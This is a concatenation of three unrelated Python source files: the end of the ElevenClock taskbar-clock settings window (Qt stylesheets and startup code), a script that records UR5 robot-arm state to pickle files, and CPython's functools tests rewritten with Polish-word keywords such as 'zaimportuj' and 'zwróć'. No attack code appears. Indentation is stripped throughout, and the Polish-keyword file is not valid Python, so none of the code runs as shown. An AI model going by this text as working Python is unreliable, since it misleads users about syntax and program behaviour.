height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #404040;
}}
#stCmbbx:hover {{
background-color: #393939;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #414141;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #454545;
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid #1c1c1c;
padding: {self.getPx(4)}px;
outline: 0px;
padding-right: {self.getPx(0)}px;
background-color: #303030;
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background-color: #4c4c4c;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QSCrollArea, QVBoxLayout{{
border: none;
margin: none;
padding: none;
outline: none;
}}
QScrollBar:vertical {{
background: #303030;
margin: {self.getPx(4)}px;
width: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar::handle:vertical {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #505050;
}}
QScrollBar::handle:vertical:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #808080;
}}
QScrollBar::add-line:vertical {{
height: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line:vertical {{
height: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {{
background: none;
}}
QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {{
background: none;
}}
""")
else:
self.iconMode = "black"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.PichonButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.CofeeButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.startupButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.RegionButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.WebPageButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.logButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.IssueButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.closeButton.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.openTranslateButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.setStyleSheet(f"""
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: #ffffff;
selection-background-color: rgb({colors[3]});
border: none;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(200, 200, 200);
padding: {self.getPx(2)}px;
outline: 0px;
color: black;
background: #eeeeee;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(200, 200, 200);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(0, 0, 0, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#background {{
color: white;
}}
* {{
background-color: #eeeeee;
color: #000000;
font-size: 8pt;
}}
QPushButton {{
width: 100px;
background-color: #ffffff;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
QPushButton:hover {{
background-color: #f6f6f6;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#AccentButton{{
background-color: rgb({colors[3]});
border-color: rgb({colors[4]});
border-bottom-color: rgb({colors[5]});
color: white;
}}
#AccentButton:hover{{
background-color: rgb({colors[2]});
border-color: rgb({colors[3]});
color: white;
border-bottom-color: rgb({colors[3]});
}}
#title{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 1px;
font-size: 13pt;
border-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: #ffffff;
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
border-bottom: 1px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: #ffffff;
border: {self.getPx(1)}px solid #bbbbbb;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #eeeeee;
border: {self.getPx(1)}px solid #bbbbbb;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(0)}px solid #bbbbbb;
background-color: rgb({colors[4]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(0)}px solid #bbbbbb;
background-color: rgb({colors[3]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stCmbbx {{
width: 100px;
background-color: #ffffff;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#stCmbbx:hover {{
background-color: #f6f6f6;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid #dddddd;
padding: {self.getPx(4)}px;
outline: 0px;
background-color: #ffffff;
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background-color: #eeeeee;
height: {self.getPx(30)}px;
outline: none;
color: black;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QSCrollArea,QVBoxLayout{{
border: none;
margin: none;
padding: none;
outline: none;
}}
QScrollBar:vertical {{
background: #ffffff;
margin: {self.getPx(4)}px;
width: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar::handle:vertical {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #dddddd;
}}
QScrollBar::handle:vertical:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #bbbbbb;
}}
QScrollBar::add-line:vertical {{
height: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line:vertical {{
height: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {{
background: none;
}}
QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {{
background: none;
}}
""")
def showDebugInfo(self):
global old_stdout, buffer
win = QMainWindow(self)
win.resize(800, 600)
win.setWindowTitle("ElevenClock's log")
textEdit = QPlainTextEdit()
textEdit.setReadOnly(True)
sys.stdout = old_stdout # Put the old stream back in place
textEdit.setPlainText(buffer.getvalue())
old_stdout = sys.stdout # Memorize the default stdout stream
sys.stdout = buffer = io.StringIO()
win.setCentralWidget(textEdit)
win.show()
def moveEvent(self, event: QMoveEvent) -> None:
if(self.updateSize):
self.resizewidget.resize(self.width()-self.getPx(17), self.resizewidget.height())
self.resizewidget.setMinimumHeight(self.resizewidget.sizeHint().height())
else:
def enableUpdateSize(self: SettingsWindow):
time.sleep(1)
self.updateSize = True
self.updateSize = False
KillableThread(target=enableUpdateSize, args=(self,)).start()
def resizeEvent(self, event: QMoveEvent) -> None:
self.resizewidget.resize(self.width()-self.getPx(17), self.resizewidget.height())
self.resizewidget.setMinimumHeight(self.resizewidget.sizeHint().height())
def show(self) -> None:
self.applyStyleSheet()
self.raise_()
return super().show()
def showEvent(self, event: QShowEvent) -> None:
self.resizewidget.setMinimumHeight(self.resizewidget.sizeHint().height())
return super().showEvent(event)
def closeEvent(self, event: QCloseEvent) -> None:
self.hide()
event.ignore()
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
# Start of main script
try:
os.chdir(os.path.expanduser("~"))
os.chdir(".elevenclock")
except FileNotFoundError:
os.mkdir(".elevenclock")
if hasattr(sys, 'frozen'):
realpath = sys._MEIPASS
else:
realpath = '/'.join(sys.argv[0].replace("\\", "/").split("/")[:-1])
languages = {
"ca": lang_ca,
"de": lang_de,
"el": lang_el,
"en": lang_en,
"es": lang_es,
"fr": lang_fr,
"it": lang_it,
"ko": lang_ko,
"nb": lang_nb,
"nl": lang_nl,
"pl": lang_pl,
"pt": lang_pt,
"ru": lang_ru,
"tr": lang_tr,
"vi": lang_vi,
"zh_TW": lang_zh_TW,
}
languageReference = {
"default": "System language",
"ca": "Catalan",
"nl": "Dutch" ,
"en": "English",
"fr": "French" ,
"de": "German" ,
"el": "Greek" ,
"it": "Italian",
"ko": "Korean ",
"nb": "Norwegian",
"es": "Spanish",
"pl": "Polish" ,
"pt": "Portuguese",
"ru": "Russian",
"tr": "Turkish",
"vi": "Vietnamese",
"zh_TW": "Chinese Traditional (Taiwan)",
}
if getSettingsValue("PreferredLanguage") == "":
setSettingsValue("PreferredLanguage", "default", False)
if getSettingsValue("PreferredLanguage") == "default":
langName = "default"
try:
print(locale.getdefaultlocale()[0][0:2])
langName = locale.getdefaultlocale()[0][0:2]
if(langName != "zh"):
lang = languages[langName]
elif(locale.getdefaultlocale()[0].replace("\n", "").strip() == "zh_TW"):
langName = "zh_TW"
lang = languages["zh_TW"]
else:
raise KeyError(f"Value not found for {langName}")
except KeyError:
lang = lang_en
print("unknown language")
except Exception as e:
print(e)
lang = lang_en
else:
try:
print(getSettingsValue("PreferredLanguage")[0:2])
langName = getSettingsValue("PreferredLanguage")[0:2]
if(langName != "zh"):
lang = languages[langName]
elif(getSettingsValue("PreferredLanguage").replace("\n", "").strip() == "zh_TW"):
langName = "zh_TW"
lang = languages["zh_TW"]
else:
raise KeyError(f"Value not found for {langName}")
except KeyError:
lang = lang_en
langName = "en"
print("unknown language")
except Exception as e:
print(e)
lang = lang_en
langName = "en"
if lang == None:
lang = lang_en
tdir = tempfile.TemporaryDirectory()
tempDir = tdir.name
seconddoubleclick = False
isRDPRunning = False
showSeconds = 0
timeStr = ""
dateTimeFormat = ""
mController = MouseController()
clocks = []
oldScreens = []
QApplication.setAttribute(Qt.AA_DisableHighDpiScaling)
app = QApplication()
app.setQuitOnLastWindowClosed(False)
signal = RestartSignal()
showNotif = InfoSignal()
showWarn = InfoSignal()
killSignal = InfoSignal()
sw = SettingsWindow()
i = TaskbarIconTray(app)
showNotif.infoSignal.connect(lambda a, b: showMessage(a, b))
showWarn.infoSignal.connect(lambda a, b: wanrUserAboutUpdates(a, b))
killSignal.infoSignal.connect(lambda: app.quit())
KillableThread(target=updateChecker, daemon=True).start()
KillableThread(target=isElevenClockRunning, daemon=True).start()
KillableThread(target=checkIfWokeUp, daemon=True).start()
st: KillableThread = None # Will be defined on loadClocks
rdpThread = KillableThread(target=checkRDP, daemon=True)
timethread = KillableThread(target=timeStrThread, daemon=True)
timethread.start()
if(getSettings("EnableHideOnRDP")):
rdpThread.start()
signal.restartSignal.connect(lambda: restartClocks("checkLoop"))
loadClocks()
if not(getSettings("Updated2.5Already")) and not(getSettings("EnableSilentUpdates")):
print("Show2.5Welcome")
sw.show()
setSettings("Updated2.5Already", True)
QMessageBox.information(sw, "ElevenClock updated!", "ElevenClock has updated to version 2.5 sucessfully. On this release:\n\n - Elevenclock can hide when using Cytrix Workspace\n - ElevenClock can be forced to show with black text\n - If silent updates enables, user won't see this popup\n - ElevenClock has an in-app log viewer (can be opened from settings)\n - Hover effect improvements\n - Much more!")
showSettings = False
if("--settings" in sys.argv or showSettings):
sw.show()
if("--quit-on-loaded" in sys.argv):
sys.exit(0)
app.exec_()
sys.exit(0)
|
RecoderRobotData.py
|
# MIT License.
# Copyright (c) 2020 by BioicDL. All rights reserved.
# Created by LiuXb on 2020/11/24
# -*- coding:utf-8 -*-
"""
@Modified:
@Description:
"""
import threading
import time
import queue
from deepclaw.driver.arms import URController_rtde as URctl
from deepclaw.driver.arms.ArmController import ArmController
import pickle
# receive
class GetRobotData(object):
def __init__(self):
self.flag = True
def stop(self):
self.flag = False
# push data to buffer
def run(self, robot: ArmController, data_buffer: queue.Queue):
while self.flag:
status = robot.get_state()
time.sleep(0.01)
time_stamp = time.time()
status.update({'time': time_stamp})
data_buffer.put(status)
# print(data_buffer.get())
# write
class SaveRobotData(object):
def __init__(self):
self.flag = True
def stop(self):
self.flag = False
def run(self, data_buffer: queue.Queue, filename: str):
while self.flag:
time.sleep(0.01)
if data_buffer.empty():
continue
else:
dd = data_buffer.get()
with open(filename, "ab") as f:
pickle.dump(dd, f)
class MoveRobot(object):
def __init__(self):
self.flag = True
self.action = None
self.joint = None
def stop(self):
self.flag = False
def set_joints(self, joint):
self.joint = joint
def run(self, robot: ArmController, data_buffer: queue.Queue = queue.Queue(maxsize=5000)):
# get data
gd = GetRobotData()
read_thread = threading.Thread(target=gd.run, args=(robot, data_buffer,), daemon=True)
read_thread.start()
srd = SaveRobotData()
write_thread = threading.Thread(target=srd.run, args=(data_buffer, 'test12.result'), daemon=True)
write_thread.start()
# robot move
# start_joints = [-1.57, -1.57, -1.57, -1.9, 1.57, -1.57]
# target_joints = [-1.57, -1.57, -0.9, -0.8, 1.57, -1.57]
# robot.move_j(start_joints, 3, 6)
# robot.move_j(target_joints, 3, 6)
# start_point = [-0.18246, -0.68835, 0.45416, 1.6984, -1.8888, 0.6290]
# end_point = [-0.0, -0.4, 0.3, 1.6984, -1.8888, 0.6290]
start_point = [-0.3892851151079589, -0.3682649768115375, 0.04614461354888244, 2.2542664595069044, -2.1577230405724532, 0.0400075423311235]
end_point = [0.15187793252132198, -0.3682209644731936, 0.04613768841089927, 2.254392008739246, -2.157709829869653, 0.03999406389204092]
end_point = [0.15187289148918068, -0.36824285448867394, 0.19094064392090843, 2.2543793879010128, -2.157687910000569, 0.040065884281925035]
start_point = [-0.11335, -0.30967, 0.12822 + 0.0, 2.2166, -2.2166, 0]
target_point = [-0.11497, -0.70276, 0.40416+0.05, 1.7987, -1.8151, 0.6662]
# robot.move_L(start_point)
# robot.move_L(target_point, 2, 8)
# robot.move_p(start_point)
# robot.move_p(target_point, 2, 8)
start_joint2 = [-1.63, -1.57, -1.57, -1.9, 1.57, -1.57]
target_joint2 = [-1.63, -1.833, -1.15, -0.8, 1.57, -1.57]
robot.move_j(start_joint2, 3, 15)
robot.move_j(target_joint2, 3, 15)
# robot.move_j(self.joint, 2.8, 2.2)
gd.stop()
srd.stop()
robot.move_L(start_point)
if __name__ == '__main__':
rb = URctl.URController('../../configs/basic_config/robot_ur5.yaml')
print('Start move!')
joints_pos = [-1.41319307, -1.51162964, -1.66329875, -1.50447379, 1.53746051, 0.14490873]
db = queue.Queue(maxsize=0)
x = MoveRobot()
x.set_joints(joints_pos)
x.run(rb, db)
# state = robot.get_state()
# print(state)
# rb.go_home()
# home_joints = [-1.57, -1.57, -1.57, -1.9, 1.57, -1.57]
# # rb.move_j(home_joints, 2, 4)
# print('reach home pose')
# for i in range(10):
# status = robot.get_state()
# time_stamp = time.time()
# status.update({'time': time_stamp})
# print(status)
# time.sleep(0.5)
# with open("dict", "ab") as f:
# pickle.dump(status, f)
#
print('============================================')
with open("test8.txt", 'rb') as f:
while True:
try:
aa = pickle.load(f)
print(aa)
except EOFError:
break
|
test_functools.py
|
zaimportuj abc
zaimportuj collections
z itertools zaimportuj permutations
zaimportuj pickle
z random zaimportuj choice
zaimportuj sys
z test zaimportuj support
zaimportuj unittest
z weakref zaimportuj proxy
spróbuj:
zaimportuj threading
wyjąwszy ImportError:
threading = Nic
zaimportuj functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
def capture(*args, **kw):
"""capture all positional oraz keyword arguments"""
zwróć args, kw
def signature(part):
""" zwróć the signature of a partial object """
zwróć (part.func, part.args, part.keywords, part.__dict__)
klasa TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertPrawda(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
spróbuj:
self.partial(2)()
wyjąwszy TypeError:
dalej
inaczej:
self.fail('First arg nie checked dla callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should nie be altered by partial
def func(a=10, b=20):
zwróć a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_arg_combinations(self):
# exercise special code paths dla zero args w either partial
# object albo the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths dla no keyword args w
# either the partial object albo the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args w the call override those w the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
dla args w [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertPrawda(expected == got oraz empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
dla a w ['a', 0, Nic, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':Nic}
empty, got = p(x=Nic)
self.assertPrawda(expected == got oraz empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertPrawda(args1 == (0,1) oraz kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertPrawda(args2 == (0,) oraz kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = Nic
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
# Only "true" partial jest optimized
jeżeli partial.__name__ != 'partial':
zwróć
inner = partial(signature, 'asdf')
nested = partial(inner, bar=Prawda)
flat = partial(signature, 'asdf', bar=Prawda)
self.assertEqual(signature(nested), signature(flat))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
klasa TestPartialC(TestPartial, unittest.TestCase):
jeżeli c_functools:
partial = c_functools.partial
def test_attributes_unwritable(self):
# attributes should nie be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
spróbuj:
usuń p.__dict__
wyjąwszy TypeError:
dalej
inaczej:
self.fail('partial object allowed __dict__ to be deleted')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) dla a w args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
jeżeli self.partial jest c_functools.partial:
name = 'functools.partial'
inaczej:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual('{}({!r})'.format(name, capture),
repr(f))
f = self.partial(capture, *args)
self.assertEqual('{}({!r}, {})'.format(name, capture, args_repr),
repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
['{}({!r}, {})'.format(name, capture, kwargs_repr)
dla kwargs_repr w kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
['{}({!r}, {}, {})'.format(name, capture, args_repr, kwargs_repr)
dla kwargs_repr w kwargs_reprs])
def test_pickle(self):
f = self.partial(signature, 'asdf', bar=Prawda)
f.add_something_to__dict__ = Prawda
dla proto w range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f), signature(f_copy))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
klasa BadSequence:
def __len__(self):
zwróć 4
def __getitem__(self, key):
jeżeli key == 0:
zwróć max
albo_inaczej key == 1:
zwróć tuple(range(1000000))
albo_inaczej key w (2, 3):
zwróć {}
podnieś IndexError
f = self.partial(object)
self.assertRaisesRegex(SystemError,
"new style getargs format but argument jest nie a tuple",
f.__setstate__, BadSequence())
klasa TestPartialPy(TestPartial, unittest.TestCase):
partial = staticmethod(py_functools.partial)
jeżeli c_functools:
klasa PartialSubclass(c_functools.partial):
dalej
@unittest.skipUnless(c_functools, 'requires the C _functools module')
klasa TestPartialCSubclass(TestPartialC):
jeżeli c_functools:
partial = PartialSubclass
klasa TestPartialMethod(unittest.TestCase):
klasa A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertNieprawda(hasattr(obj.both, "__self__"))
self.assertNieprawda(hasattr(obj.nested, "__self__"))
self.assertNieprawda(hasattr(obj.over_partial, "__self__"))
self.assertNieprawda(hasattr(obj.static, "__self__"))
self.assertNieprawda(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
dla obj w [self.A, self.a]:
przy self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
przy self.assertRaises(TypeError):
klasa B(object):
method = functools.partialmethod(Nic, 1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
klasa Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
dalej
add5 = functools.partialmethod(add, 5)
self.assertPrawda(Abstract.add.__isabstractmethod__)
